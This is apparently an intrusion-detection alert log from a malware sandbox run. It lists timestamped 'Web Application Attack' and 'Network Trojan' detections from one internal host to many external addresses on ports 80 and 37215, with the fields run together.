              2025-02-04T18:11:40.782556+010020290341Web Application Attack192.168.2.15337649.119.226.18580TCP
              2025-02-04T18:11:40.813951+010020290341Web Application Attack192.168.2.1547682222.146.115.15380TCP
              2025-02-04T18:11:40.813985+010020290341Web Application Attack192.168.2.1543710155.48.55.4180TCP
              2025-02-04T18:11:40.815963+010020290341Web Application Attack192.168.2.1558146161.215.111.3780TCP
              2025-02-04T18:11:40.819661+010020290341Web Application Attack192.168.2.1543058125.144.55.23680TCP
              2025-02-04T18:11:40.869899+010020290341Web Application Attack192.168.2.1559318162.28.10.14880TCP
              2025-02-04T18:11:40.870111+010020290341Web Application Attack192.168.2.154979274.137.199.23180TCP
              2025-02-04T18:11:40.909562+010020290341Web Application Attack192.168.2.1547526204.176.132.11080TCP
              2025-02-04T18:11:40.956193+010020290341Web Application Attack192.168.2.153724884.0.101.24480TCP
              2025-02-04T18:11:41.038420+010020290341Web Application Attack192.168.2.1533010207.26.197.3680TCP
              2025-02-04T18:11:41.054205+010020290341Web Application Attack192.168.2.1536766143.23.249.3880TCP
              2025-02-04T18:11:41.096874+010020290341Web Application Attack192.168.2.154502232.71.11.10180TCP
              2025-02-04T18:11:41.128485+010020290341Web Application Attack192.168.2.155089842.77.12.9580TCP
              2025-02-04T18:11:41.161397+010020290341Web Application Attack192.168.2.155362617.53.64.20780TCP
              2025-02-04T18:11:41.241387+010020290341Web Application Attack192.168.2.155346435.94.114.16180TCP
              2025-02-04T18:11:41.241658+010020290341Web Application Attack192.168.2.154206479.68.93.2380TCP
              2025-02-04T18:11:41.266869+010020290341Web Application Attack192.168.2.1541752180.247.222.11980TCP
              2025-02-04T18:11:41.272562+010020290341Web Application Attack192.168.2.1556602126.182.35.20580TCP
              2025-02-04T18:11:41.298784+010020290341Web Application Attack192.168.2.156008640.54.178.14180TCP
              2025-02-04T18:11:41.304523+010020290341Web Application Attack192.168.2.1546724206.199.245.3680TCP
              2025-02-04T18:11:41.331767+010020290341Web Application Attack192.168.2.153651493.55.208.18480TCP
              2025-02-04T18:11:41.814107+010020290341Web Application Attack192.168.2.1539428183.119.84.21480TCP
              2025-02-04T18:11:41.814109+010020290341Web Application Attack192.168.2.154019225.68.126.5080TCP
              2025-02-04T18:11:41.831245+010020290341Web Application Attack192.168.2.155944054.197.207.1380TCP
              2025-02-04T18:11:41.831388+010020290341Web Application Attack192.168.2.1540176144.229.87.24280TCP
              2025-02-04T18:11:41.869999+010020290341Web Application Attack192.168.2.153401240.144.172.480TCP
              2025-02-04T18:11:41.870000+010020290341Web Application Attack192.168.2.154562042.210.68.20780TCP
              2025-02-04T18:11:41.870769+010020290341Web Application Attack192.168.2.1558574204.137.209.7580TCP
              2025-02-04T18:11:42.807366+010020290341Web Application Attack192.168.2.1555376151.3.92.18780TCP
              2025-02-04T18:11:42.816530+010020290341Web Application Attack192.168.2.1533914130.194.192.13180TCP
              2025-02-04T18:11:42.831571+010020290341Web Application Attack192.168.2.1538374166.170.65.20480TCP
              2025-02-04T18:11:42.871695+010020290341Web Application Attack192.168.2.1550488200.200.243.5680TCP
              2025-02-04T18:11:42.871750+010020290341Web Application Attack192.168.2.1533266191.252.64.22180TCP
              2025-02-04T18:11:42.871925+010020290341Web Application Attack192.168.2.1556554145.56.156.19580TCP
              2025-02-04T18:11:42.872282+010020290341Web Application Attack192.168.2.1546742187.194.10.19680TCP
              2025-02-04T18:11:42.872397+010020290341Web Application Attack192.168.2.153321827.157.203.19680TCP
              2025-02-04T18:11:42.872723+010020290341Web Application Attack192.168.2.154399223.137.87.16780TCP
              2025-02-04T18:11:42.873953+010020290341Web Application Attack192.168.2.1550216180.142.123.2780TCP
              2025-02-04T18:11:42.892068+010020290341Web Application Attack192.168.2.1547328117.127.29.4480TCP
              2025-02-04T18:11:42.894055+010020290341Web Application Attack192.168.2.155437258.27.47.22280TCP
              2025-02-04T18:11:42.898202+010020290341Web Application Attack192.168.2.155089813.138.57.21480TCP
              2025-02-04T18:11:42.914695+010020290341Web Application Attack192.168.2.154224090.177.70.1080TCP
              2025-02-04T18:11:43.053941+010020290341Web Application Attack192.168.2.1551524186.177.39.20080TCP
              2025-02-04T18:11:43.143875+010020290341Web Application Attack192.168.2.1544120179.210.59.21180TCP
              2025-02-04T18:11:43.195580+010020290341Web Application Attack192.168.2.1547236194.139.104.20380TCP
              2025-02-04T18:11:43.301991+010020290341Web Application Attack192.168.2.1558230219.172.14.2980TCP
              2025-02-04T18:11:43.313904+010020290341Web Application Attack192.168.2.1549030166.123.231.17980TCP
              2025-02-04T18:11:43.415622+010020290341Web Application Attack192.168.2.154806617.196.195.9580TCP
              2025-02-04T18:11:43.442774+010020290341Web Application Attack192.168.2.1547862126.24.223.9880TCP
              2025-02-04T18:11:43.458803+010020290341Web Application Attack192.168.2.1543838220.194.72.14680TCP
              2025-02-04T18:11:43.538505+010020290341Web Application Attack192.168.2.1556918199.63.47.20980TCP
              2025-02-04T18:11:43.552474+010020290341Web Application Attack192.168.2.15383482.113.145.2680TCP
              2025-02-04T18:11:43.565862+010020290341Web Application Attack192.168.2.154616866.85.21.13980TCP
              2025-02-04T18:11:43.646587+010020290341Web Application Attack192.168.2.1538874193.2.130.24580TCP
              2025-02-04T18:11:43.689135+010020290341Web Application Attack192.168.2.154943270.252.93.5980TCP
              2025-02-04T18:11:43.720254+010020290341Web Application Attack192.168.2.154319674.202.42.980TCP
              2025-02-04T18:11:43.806078+010020290341Web Application Attack192.168.2.154885476.137.1.18080TCP
              2025-02-04T18:11:43.829513+010020290341Web Application Attack192.168.2.153659683.133.89.18280TCP
              2025-02-04T18:11:43.867323+010020290341Web Application Attack192.168.2.15543868.144.12.8880TCP
              2025-02-04T18:11:43.867370+010020290341Web Application Attack192.168.2.15444229.135.213.1680TCP
              2025-02-04T18:11:43.867556+010020290341Web Application Attack192.168.2.1556248220.183.243.17280TCP
              2025-02-04T18:11:43.868604+010020290341Web Application Attack192.168.2.154954439.92.130.20680TCP
              2025-02-04T18:11:43.868635+010020290341Web Application Attack192.168.2.153712431.174.97.13580TCP
              2025-02-04T18:11:43.868693+010020290341Web Application Attack192.168.2.155822260.220.250.24980TCP
              2025-02-04T18:11:43.868926+010020290341Web Application Attack192.168.2.153928084.153.123.23580TCP
              2025-02-04T18:11:43.869677+010020290341Web Application Attack192.168.2.1549952160.19.223.2580TCP
              2025-02-04T18:11:43.869785+010020290341Web Application Attack192.168.2.1538648137.251.33.15480TCP
              2025-02-04T18:11:43.869864+010020290341Web Application Attack192.168.2.1554582211.243.248.19280TCP
              2025-02-04T18:11:43.869866+010020290341Web Application Attack192.168.2.1545518139.241.185.9680TCP
              2025-02-04T18:11:43.869894+010020290341Web Application Attack192.168.2.1552556174.26.69.18780TCP
              2025-02-04T18:11:43.869951+010020290341Web Application Attack192.168.2.1535476171.186.242.2280TCP
              2025-02-04T18:11:43.869968+010020290341Web Application Attack192.168.2.1535974128.120.255.480TCP
              2025-02-04T18:11:43.870098+010020290341Web Application Attack192.168.2.154116254.251.33.1880TCP
              2025-02-04T18:11:43.870103+010020290341Web Application Attack192.168.2.1549432141.20.42.23880TCP
              2025-02-04T18:11:43.870148+010020290341Web Application Attack192.168.2.153561097.197.78.24180TCP
              2025-02-04T18:11:43.870212+010020290341Web Application Attack192.168.2.1545780126.176.228.19780TCP
              2025-02-04T18:11:43.876728+010020290341Web Application Attack192.168.2.153642250.52.226.19580TCP
              2025-02-04T18:11:43.877396+010020290341Web Application Attack192.168.2.154379423.15.127.18380TCP
              2025-02-04T18:11:43.878866+010020290341Web Application Attack192.168.2.1553316187.217.155.17580TCP
              2025-02-04T18:11:43.884516+010020290341Web Application Attack192.168.2.1542838161.104.195.7880TCP
              2025-02-04T18:11:43.894216+010020290341Web Application Attack192.168.2.155641890.198.87.16880TCP
              2025-02-04T18:11:43.895815+010020290341Web Application Attack192.168.2.154170483.238.144.6180TCP
              2025-02-04T18:11:43.907637+010020290341Web Application Attack192.168.2.154831886.35.202.6980TCP
              2025-02-04T18:11:43.913606+010020290341Web Application Attack192.168.2.153784663.54.131.2080TCP
              2025-02-04T18:11:43.913830+010020290341Web Application Attack192.168.2.153838257.0.217.8480TCP
              2025-02-04T18:11:43.913899+010020290341Web Application Attack192.168.2.1550544113.9.76.5580TCP
              2025-02-04T18:11:43.914016+010020290341Web Application Attack192.168.2.15333869.120.59.10080TCP
              2025-02-04T18:11:43.915770+010020290341Web Application Attack192.168.2.156069625.119.53.580TCP
              2025-02-04T18:11:43.942810+010020290341Web Application Attack192.168.2.154771841.39.69.13980TCP
              2025-02-04T18:11:43.974132+010020290341Web Application Attack192.168.2.1535178179.192.200.23180TCP
              2025-02-04T18:11:44.007263+010020290341Web Application Attack192.168.2.1537570158.116.133.14480TCP
              2025-02-04T18:11:44.065988+010020290341Web Application Attack192.168.2.153821674.93.106.20380TCP
              2025-02-04T18:11:44.085603+010020290341Web Application Attack192.168.2.1557624190.1.187.2380TCP
              2025-02-04T18:11:44.085931+010020290341Web Application Attack192.168.2.155874670.27.202.24980TCP
              2025-02-04T18:11:44.099347+010020290341Web Application Attack192.168.2.1552356113.60.71.880TCP
              2025-02-04T18:11:45.145876+010020290341Web Application Attack192.168.2.155939037.111.84.5480TCP
              2025-02-04T18:11:45.148672+010020290341Web Application Attack192.168.2.155198654.130.141.17080TCP
              2025-02-04T18:11:46.142273+010020290341Web Application Attack192.168.2.1555838202.190.152.11580TCP
              2025-02-04T18:11:46.159988+010020290341Web Application Attack192.168.2.1537292194.10.184.12480TCP
              2025-02-04T18:11:46.592325+010020290341Web Application Attack192.168.2.153396418.238.109.20580TCP
              2025-02-04T18:11:47.017846+010020290341Web Application Attack192.168.2.1547016161.225.186.18980TCP
              2025-02-04T18:11:47.142085+010020290341Web Application Attack192.168.2.154645224.76.98.280TCP
              2025-02-04T18:11:47.143736+010020290341Web Application Attack192.168.2.1556378193.158.34.3480TCP
              2025-02-04T18:11:47.147602+010020290341Web Application Attack192.168.2.1542332197.171.131.23080TCP
              2025-02-04T18:11:47.148189+010020290341Web Application Attack192.168.2.15606981.19.246.23580TCP
              2025-02-04T18:11:47.173412+010020290341Web Application Attack192.168.2.155693883.248.130.2380TCP
              2025-02-04T18:11:49.237715+010020290341Web Application Attack192.168.2.1536338121.240.223.25380TCP
              2025-02-04T18:11:49.239566+010020290341Web Application Attack192.168.2.15509621.198.0.18380TCP
              2025-02-04T18:11:49.257908+010020290341Web Application Attack192.168.2.1554824149.23.206.24480TCP
              2025-02-04T18:11:49.259114+010020290341Web Application Attack192.168.2.15383385.194.208.13380TCP
              2025-02-04T18:11:49.290571+010020290341Web Application Attack192.168.2.153580644.91.54.1380TCP
              2025-02-04T18:11:50.239651+010020290341Web Application Attack192.168.2.153503632.158.13.25280TCP
              2025-02-04T18:11:51.290778+010020290341Web Application Attack192.168.2.154777276.93.228.10380TCP
              2025-02-04T18:11:52.236751+010020290341Web Application Attack192.168.2.1537698143.146.138.16880TCP
              2025-02-04T18:11:52.236752+010020290341Web Application Attack192.168.2.1546400187.17.238.10080TCP
              2025-02-04T18:11:52.238257+010020290341Web Application Attack192.168.2.156037042.15.218.9780TCP
              2025-02-04T18:11:52.240099+010020290341Web Application Attack192.168.2.1537954152.212.91.5980TCP
              2025-02-04T18:11:52.274944+010020290341Web Application Attack192.168.2.1560098116.188.200.17380TCP
              2025-02-04T18:11:52.288547+010020290341Web Application Attack192.168.2.153803420.106.247.17380TCP
              2025-02-04T18:11:53.251913+010020290341Web Application Attack192.168.2.155660840.206.98.12080TCP
              2025-02-04T18:11:53.269463+010020290341Web Application Attack192.168.2.1548844163.146.97.22180TCP
              2025-02-04T18:11:53.269492+010020290341Web Application Attack192.168.2.1545230105.218.189.22280TCP
              2025-02-04T18:11:53.273571+010020290341Web Application Attack192.168.2.154932672.125.5.12480TCP
              2025-02-04T18:11:53.276671+010020290341Web Application Attack192.168.2.155610451.155.163.2180TCP
              2025-02-04T18:11:53.288703+010020290341Web Application Attack192.168.2.1552884201.191.230.9580TCP
              2025-02-04T18:11:54.283086+010020290341Web Application Attack192.168.2.153456886.223.23.11280TCP
              2025-02-04T18:11:54.283592+010020290341Web Application Attack192.168.2.153735664.172.203.18880TCP
              2025-02-04T18:11:54.302322+010020290341Web Application Attack192.168.2.154548431.162.52.080TCP
              2025-02-04T18:11:54.304384+010020290341Web Application Attack192.168.2.1552140216.199.168.7380TCP
              2025-02-04T18:11:54.321789+010020290341Web Application Attack192.168.2.1552674108.16.63.23380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-04T18:11:22.184807+010028352221A Network Trojan was detected192.168.2.1534772156.229.156.2537215TCP
              2025-02-04T18:11:24.307214+010028352221A Network Trojan was detected192.168.2.1537246156.231.87.11137215TCP
              2025-02-04T18:11:25.607889+010028352221A Network Trojan was detected192.168.2.156096041.164.28.937215TCP
              2025-02-04T18:11:29.469291+010028352221A Network Trojan was detected192.168.2.154762241.234.231.1537215TCP
              2025-02-04T18:11:29.869023+010028352221A Network Trojan was detected192.168.2.1535578197.210.178.6337215TCP
              2025-02-04T18:11:30.300034+010028352221A Network Trojan was detected192.168.2.1541028156.246.225.3837215TCP
              2025-02-04T18:11:33.219154+010028352221A Network Trojan was detected192.168.2.1548968197.129.25.15137215TCP
              2025-02-04T18:11:37.055574+010028352221A Network Trojan was detected192.168.2.153672841.212.96.5137215TCP
              2025-02-04T18:11:37.738100+010028352221A Network Trojan was detected192.168.2.1556422197.186.125.4937215TCP
              2025-02-04T18:11:37.773011+010028352221A Network Trojan was detected192.168.2.155309441.229.92.7237215TCP
              2025-02-04T18:11:37.788473+010028352221A Network Trojan was detected192.168.2.1547592156.232.252.3037215TCP
              2025-02-04T18:11:37.814849+010028352221A Network Trojan was detected192.168.2.1533992197.172.1.6237215TCP
              2025-02-04T18:11:37.870635+010028352221A Network Trojan was detected192.168.2.1554460197.212.217.23637215TCP
              2025-02-04T18:11:37.870945+010028352221A Network Trojan was detected192.168.2.1548016197.249.19.1037215TCP
              2025-02-04T18:11:37.895791+010028352221A Network Trojan was detected192.168.2.153750041.80.3.18937215TCP
              2025-02-04T18:11:37.910009+010028352221A Network Trojan was detected192.168.2.154456441.156.70.10837215TCP
              2025-02-04T18:11:37.989345+010028352221A Network Trojan was detected192.168.2.1549706197.159.207.22837215TCP
              2025-02-04T18:11:38.005034+010028352221A Network Trojan was detected192.168.2.155750041.229.202.4337215TCP
              2025-02-04T18:11:38.007948+010028352221A Network Trojan was detected192.168.2.153429441.216.131.12537215TCP
              2025-02-04T18:11:38.048196+010028352221A Network Trojan was detected192.168.2.1535832197.157.167.23637215TCP
              2025-02-04T18:11:38.064275+010028352221A Network Trojan was detected192.168.2.1543928197.0.255.11137215TCP
              2025-02-04T18:11:38.067721+010028352221A Network Trojan was detected192.168.2.154211641.197.212.10537215TCP
              2025-02-04T18:11:38.081694+010028352221A Network Trojan was detected192.168.2.153813841.89.103.10037215TCP
              2025-02-04T18:11:38.094935+010028352221A Network Trojan was detected192.168.2.1536264156.52.86.1837215TCP
              2025-02-04T18:11:38.118320+010028352221A Network Trojan was detected192.168.2.1556890156.221.146.3637215TCP
              2025-02-04T18:11:38.720005+010028352221A Network Trojan was detected192.168.2.1539240197.74.8.4937215TCP
              2025-02-04T18:11:38.800248+010028352221A Network Trojan was detected192.168.2.155172641.89.186.10337215TCP
              2025-02-04T18:11:38.819742+010028352221A Network Trojan was detected192.168.2.1552870156.118.10.7737215TCP
              2025-02-04T18:11:38.878617+010028352221A Network Trojan was detected192.168.2.1538764197.153.167.12537215TCP
              2025-02-04T18:11:38.878679+010028352221A Network Trojan was detected192.168.2.1542968197.109.186.14937215TCP
              2025-02-04T18:11:38.879968+010028352221A Network Trojan was detected192.168.2.153503041.237.200.16437215TCP
              2025-02-04T18:11:38.909554+010028352221A Network Trojan was detected192.168.2.1547320197.14.66.1237215TCP
              2025-02-04T18:11:38.972015+010028352221A Network Trojan was detected192.168.2.1538780197.109.31.17537215TCP
              2025-02-04T18:11:39.048243+010028352221A Network Trojan was detected192.168.2.1533700197.133.40.2437215TCP
              2025-02-04T18:11:39.052067+010028352221A Network Trojan was detected192.168.2.1549810156.80.186.25337215TCP
              2025-02-04T18:11:39.063736+010028352221A Network Trojan was detected192.168.2.1535530156.161.111.24737215TCP
              2025-02-04T18:11:39.067785+010028352221A Network Trojan was detected192.168.2.153876041.29.6.12237215TCP
              2025-02-04T18:11:39.097298+010028352221A Network Trojan was detected192.168.2.1544860156.66.193.9337215TCP
              2025-02-04T18:11:40.063768+010028352221A Network Trojan was detected192.168.2.1537782156.181.117.10337215TCP
              2025-02-04T18:11:40.067528+010028352221A Network Trojan was detected192.168.2.1538036156.87.226.22737215TCP
              2025-02-04T18:11:40.401916+010028352221A Network Trojan was detected192.168.2.1540210197.5.14.4937215TCP
              2025-02-04T18:11:40.782847+010028352221A Network Trojan was detected192.168.2.1552170156.166.231.24337215TCP
              2025-02-04T18:11:40.783346+010028352221A Network Trojan was detected192.168.2.1556370197.206.55.4637215TCP
              2025-02-04T18:11:40.923093+010028352221A Network Trojan was detected192.168.2.155081641.137.88.11837215TCP
              2025-02-04T18:11:40.960009+010028352221A Network Trojan was detected192.168.2.155817241.106.217.5537215TCP
              2025-02-04T18:11:40.991452+010028352221A Network Trojan was detected192.168.2.1533738156.129.236.10037215TCP
              2025-02-04T18:11:41.034633+010028352221A Network Trojan was detected192.168.2.154373241.238.27.18537215TCP
              2025-02-04T18:11:41.063882+010028352221A Network Trojan was detected192.168.2.155346841.90.199.4137215TCP
              2025-02-04T18:11:41.067835+010028352221A Network Trojan was detected192.168.2.1539476197.75.231.24837215TCP
              2025-02-04T18:11:41.087036+010028352221A Network Trojan was detected192.168.2.155893641.130.45.5537215TCP
              2025-02-04T18:11:41.096679+010028352221A Network Trojan was detected192.168.2.1556738156.106.230.15037215TCP
              2025-02-04T18:11:41.706603+010028352221A Network Trojan was detected192.168.2.1555504156.195.158.21637215TCP
              2025-02-04T18:11:41.764834+010028352221A Network Trojan was detected192.168.2.1549716156.231.34.24337215TCP
              2025-02-04T18:11:41.833264+010028352221A Network Trojan was detected192.168.2.1540888197.51.196.23237215TCP
              2025-02-04T18:11:41.925193+010028352221A Network Trojan was detected192.168.2.153398241.247.70.437215TCP
              2025-02-04T18:11:41.939451+010028352221A Network Trojan was detected192.168.2.1555982197.229.162.8237215TCP
              2025-02-04T18:11:41.942683+010028352221A Network Trojan was detected192.168.2.1535342197.165.49.3137215TCP
              2025-02-04T18:11:41.954575+010028352221A Network Trojan was detected192.168.2.153456441.160.92.13937215TCP
              2025-02-04T18:11:41.960349+010028352221A Network Trojan was detected192.168.2.1538700197.211.217.17437215TCP
              2025-02-04T18:11:41.970172+010028352221A Network Trojan was detected192.168.2.1543636197.225.24.5537215TCP
              2025-02-04T18:11:42.970033+010028352221A Network Trojan was detected192.168.2.1560952156.136.36.3237215TCP
              2025-02-04T18:11:42.989615+010028352221A Network Trojan was detected192.168.2.154499241.7.140.15137215TCP
              2025-02-04T18:11:42.989623+010028352221A Network Trojan was detected192.168.2.1548144156.60.233.037215TCP
              2025-02-04T18:11:44.065977+010028352221A Network Trojan was detected192.168.2.1541832156.158.79.19137215TCP
              2025-02-04T18:11:44.079633+010028352221A Network Trojan was detected192.168.2.153431241.253.49.6637215TCP
              2025-02-04T18:11:44.080151+010028352221A Network Trojan was detected192.168.2.1534360156.146.215.9837215TCP
              2025-02-04T18:11:44.084063+010028352221A Network Trojan was detected192.168.2.1549078197.88.243.21837215TCP
              2025-02-04T18:11:44.098916+010028352221A Network Trojan was detected192.168.2.153912641.190.19.20037215TCP
              2025-02-04T18:11:44.578119+010028352221A Network Trojan was detected192.168.2.1551222156.228.164.11037215TCP
              2025-02-04T18:11:44.973776+010028352221A Network Trojan was detected192.168.2.1554430156.158.216.17337215TCP
              2025-02-04T18:11:44.977178+010028352221A Network Trojan was detected192.168.2.153529841.127.128.037215TCP
              2025-02-04T18:11:44.983197+010028352221A Network Trojan was detected192.168.2.154707841.114.117.19037215TCP
              2025-02-04T18:11:44.985948+010028352221A Network Trojan was detected192.168.2.1541990197.79.247.5037215TCP
              2025-02-04T18:11:44.985948+010028352221A Network Trojan was detected192.168.2.1550026156.206.254.22537215TCP
              2025-02-04T18:11:44.987829+010028352221A Network Trojan was detected192.168.2.1538708197.198.35.1637215TCP
              2025-02-04T18:11:44.988326+010028352221A Network Trojan was detected192.168.2.1553756197.57.30.18637215TCP
              2025-02-04T18:11:44.988899+010028352221A Network Trojan was detected192.168.2.1540228197.152.15.12437215TCP
              2025-02-04T18:11:44.991830+010028352221A Network Trojan was detected192.168.2.1547110197.44.208.17437215TCP
              2025-02-04T18:11:44.991851+010028352221A Network Trojan was detected192.168.2.1541612156.193.79.19637215TCP
              2025-02-04T18:11:44.992124+010028352221A Network Trojan was detected192.168.2.1540230156.80.185.15637215TCP
              2025-02-04T18:11:45.146810+010028352221A Network Trojan was detected192.168.2.1555192197.104.233.25337215TCP
              2025-02-04T18:11:45.160769+010028352221A Network Trojan was detected192.168.2.1558656156.64.0.12837215TCP
              2025-02-04T18:11:45.956409+010028352221A Network Trojan was detected192.168.2.1541508156.99.113.2437215TCP
              2025-02-04T18:11:45.970245+010028352221A Network Trojan was detected192.168.2.1557236156.60.115.24437215TCP
              2025-02-04T18:11:45.970378+010028352221A Network Trojan was detected192.168.2.1553304156.28.114.5937215TCP
              2025-02-04T18:11:45.971090+010028352221A Network Trojan was detected192.168.2.1536858156.80.73.9037215TCP
              2025-02-04T18:11:45.972348+010028352221A Network Trojan was detected192.168.2.1539020156.127.18.24837215TCP
              2025-02-04T18:11:45.972707+010028352221A Network Trojan was detected192.168.2.1555670156.166.178.337215TCP
              2025-02-04T18:11:45.973048+010028352221A Network Trojan was detected192.168.2.1553108197.58.88.19737215TCP
              2025-02-04T18:11:45.973086+010028352221A Network Trojan was detected192.168.2.1552954156.79.255.14237215TCP
              2025-02-04T18:11:45.974045+010028352221A Network Trojan was detected192.168.2.1536886197.119.87.18537215TCP
              2025-02-04T18:11:45.974222+010028352221A Network Trojan was detected192.168.2.1541032156.147.94.23537215TCP
              2025-02-04T18:11:45.974528+010028352221A Network Trojan was detected192.168.2.154061841.204.54.25437215TCP
              2025-02-04T18:11:45.976179+010028352221A Network Trojan was detected192.168.2.1534764197.34.184.21537215TCP
              2025-02-04T18:11:45.985850+010028352221A Network Trojan was detected192.168.2.1539920197.116.128.11737215TCP
              2025-02-04T18:11:45.985914+010028352221A Network Trojan was detected192.168.2.153588041.136.19.22137215TCP
              2025-02-04T18:11:45.989346+010028352221A Network Trojan was detected192.168.2.1559756197.243.83.15237215TCP
              2025-02-04T18:11:45.989619+010028352221A Network Trojan was detected192.168.2.1537002156.237.202.6737215TCP
              2025-02-04T18:11:45.989843+010028352221A Network Trojan was detected192.168.2.1557748197.234.52.3237215TCP
              2025-02-04T18:11:45.990492+010028352221A Network Trojan was detected192.168.2.1550130156.14.214.23037215TCP
              2025-02-04T18:11:45.990778+010028352221A Network Trojan was detected192.168.2.1544816156.53.45.24437215TCP
              2025-02-04T18:11:45.991048+010028352221A Network Trojan was detected192.168.2.154738241.210.51.16537215TCP
              2025-02-04T18:11:45.991190+010028352221A Network Trojan was detected192.168.2.1551666197.158.248.18937215TCP
              2025-02-04T18:11:45.992500+010028352221A Network Trojan was detected192.168.2.1558970197.58.112.23337215TCP
              2025-02-04T18:11:46.035349+010028352221A Network Trojan was detected192.168.2.1539468197.80.140.13737215TCP
              2025-02-04T18:11:46.568199+010028352221A Network Trojan was detected192.168.2.1539100156.225.90.13437215TCP
              2025-02-04T18:11:46.933235+010028352221A Network Trojan was detected192.168.2.1543392156.236.14.8837215TCP
              2025-02-04T18:11:47.001500+010028352221A Network Trojan was detected192.168.2.1553070197.137.12.6437215TCP
              2025-02-04T18:11:47.001610+010028352221A Network Trojan was detected192.168.2.154535841.234.149.16437215TCP
              2025-02-04T18:11:47.002249+010028352221A Network Trojan was detected192.168.2.1559104197.214.151.18837215TCP
              2025-02-04T18:11:47.018937+010028352221A Network Trojan was detected192.168.2.1548378197.153.147.037215TCP
              2025-02-04T18:11:47.019026+010028352221A Network Trojan was detected192.168.2.1541392156.121.211.22837215TCP
              2025-02-04T18:11:47.020842+010028352221A Network Trojan was detected192.168.2.1545310156.41.200.15437215TCP
              2025-02-04T18:11:47.032778+010028352221A Network Trojan was detected192.168.2.155234441.13.201.637215TCP
              2025-02-04T18:11:47.035299+010028352221A Network Trojan was detected192.168.2.1535024156.165.110.10137215TCP
              2025-02-04T18:11:47.038413+010028352221A Network Trojan was detected192.168.2.154604441.59.4.9537215TCP
              2025-02-04T18:11:47.040310+010028352221A Network Trojan was detected192.168.2.1559366156.80.97.5937215TCP
              2025-02-04T18:11:47.052155+010028352221A Network Trojan was detected192.168.2.1556160156.73.163.2237215TCP
              2025-02-04T18:11:47.054258+010028352221A Network Trojan was detected192.168.2.153570441.24.75.8937215TCP
              2025-02-04T18:11:47.056033+010028352221A Network Trojan was detected192.168.2.1550394156.242.156.3337215TCP
              2025-02-04T18:11:47.143833+010028352221A Network Trojan was detected192.168.2.1551154197.182.81.1737215TCP
              2025-02-04T18:11:47.143872+010028352221A Network Trojan was detected192.168.2.1539036156.130.121.17737215TCP
              2025-02-04T18:11:47.165413+010028352221A Network Trojan was detected192.168.2.1552604156.47.87.15737215TCP
              2025-02-04T18:11:48.001603+010028352221A Network Trojan was detected192.168.2.1536418156.110.236.15437215TCP
              2025-02-04T18:11:48.002063+010028352221A Network Trojan was detected192.168.2.1533700197.71.189.13837215TCP
              2025-02-04T18:11:48.017108+010028352221A Network Trojan was detected192.168.2.1545858197.214.176.8337215TCP
              2025-02-04T18:11:48.018067+010028352221A Network Trojan was detected192.168.2.1548330197.84.79.4037215TCP
              2025-02-04T18:11:48.018992+010028352221A Network Trojan was detected192.168.2.153344041.221.191.22937215TCP
              2025-02-04T18:11:48.032495+010028352221A Network Trojan was detected192.168.2.1551154156.54.76.23737215TCP
              2025-02-04T18:11:48.048412+010028352221A Network Trojan was detected192.168.2.1559166197.115.74.22637215TCP
              2025-02-04T18:11:48.048470+010028352221A Network Trojan was detected192.168.2.1537228156.197.91.6537215TCP
              2025-02-04T18:11:48.049026+010028352221A Network Trojan was detected192.168.2.153315641.214.32.2337215TCP
              2025-02-04T18:11:48.050010+010028352221A Network Trojan was detected192.168.2.154508841.250.150.15437215TCP
              2025-02-04T18:11:48.050300+010028352221A Network Trojan was detected192.168.2.1540350197.86.44.3937215TCP
              2025-02-04T18:11:48.050405+010028352221A Network Trojan was detected192.168.2.1551232156.119.1.15737215TCP
              2025-02-04T18:11:48.052275+010028352221A Network Trojan was detected192.168.2.1554636197.127.188.9237215TCP
              2025-02-04T18:11:48.052507+010028352221A Network Trojan was detected192.168.2.1550412156.203.209.25437215TCP
              2025-02-04T18:11:48.052595+010028352221A Network Trojan was detected192.168.2.1552172156.174.59.5637215TCP
              2025-02-04T18:11:48.053740+010028352221A Network Trojan was detected192.168.2.1543390197.21.220.13337215TCP
              2025-02-04T18:11:48.054043+010028352221A Network Trojan was detected192.168.2.1553368156.111.51.21537215TCP
              2025-02-04T18:11:48.054468+010028352221A Network Trojan was detected192.168.2.1551742156.212.221.19437215TCP
              2025-02-04T18:11:48.064010+010028352221A Network Trojan was detected192.168.2.1548422156.167.118.16937215TCP
              2025-02-04T18:11:48.064325+010028352221A Network Trojan was detected192.168.2.1535876156.194.153.16337215TCP
              2025-02-04T18:11:48.064327+010028352221A Network Trojan was detected192.168.2.1540212197.183.113.21337215TCP
              2025-02-04T18:11:48.064629+010028352221A Network Trojan was detected192.168.2.154322241.93.153.15037215TCP
              2025-02-04T18:11:48.064996+010028352221A Network Trojan was detected192.168.2.155553041.137.108.1937215TCP
              2025-02-04T18:11:48.065544+010028352221A Network Trojan was detected192.168.2.153614441.243.175.23437215TCP
              2025-02-04T18:11:48.066611+010028352221A Network Trojan was detected192.168.2.1552740197.140.242.21637215TCP
              2025-02-04T18:11:48.066659+010028352221A Network Trojan was detected192.168.2.1546914197.173.174.13637215TCP
              2025-02-04T18:11:48.066771+010028352221A Network Trojan was detected192.168.2.1550974156.157.29.7437215TCP
              2025-02-04T18:11:48.067427+010028352221A Network Trojan was detected192.168.2.1542666197.138.158.23037215TCP
              2025-02-04T18:11:48.067869+010028352221A Network Trojan was detected192.168.2.156029041.65.253.8237215TCP
              2025-02-04T18:11:48.068126+010028352221A Network Trojan was detected192.168.2.1542574197.195.178.16037215TCP
              2025-02-04T18:11:48.068575+010028352221A Network Trojan was detected192.168.2.1555462156.137.181.3537215TCP
              2025-02-04T18:11:48.068575+010028352221A Network Trojan was detected192.168.2.1535724156.35.204.4137215TCP
              2025-02-04T18:11:48.068575+010028352221A Network Trojan was detected192.168.2.155511641.200.62.2737215TCP
              2025-02-04T18:11:48.068597+010028352221A Network Trojan was detected192.168.2.1540134197.117.139.8637215TCP
              2025-02-04T18:11:48.068637+010028352221A Network Trojan was detected192.168.2.1552260197.96.246.10537215TCP
              2025-02-04T18:11:48.068720+010028352221A Network Trojan was detected192.168.2.1539304197.230.75.18537215TCP
              2025-02-04T18:11:48.069039+010028352221A Network Trojan was detected192.168.2.154781841.28.7.18737215TCP
              2025-02-04T18:11:48.069100+010028352221A Network Trojan was detected192.168.2.1539196197.217.210.14037215TCP
              2025-02-04T18:11:48.069126+010028352221A Network Trojan was detected192.168.2.1542726156.193.218.24637215TCP
              2025-02-04T18:11:48.069172+010028352221A Network Trojan was detected192.168.2.1550034197.166.194.25237215TCP
              2025-02-04T18:11:48.069785+010028352221A Network Trojan was detected192.168.2.1541826156.223.115.21737215TCP
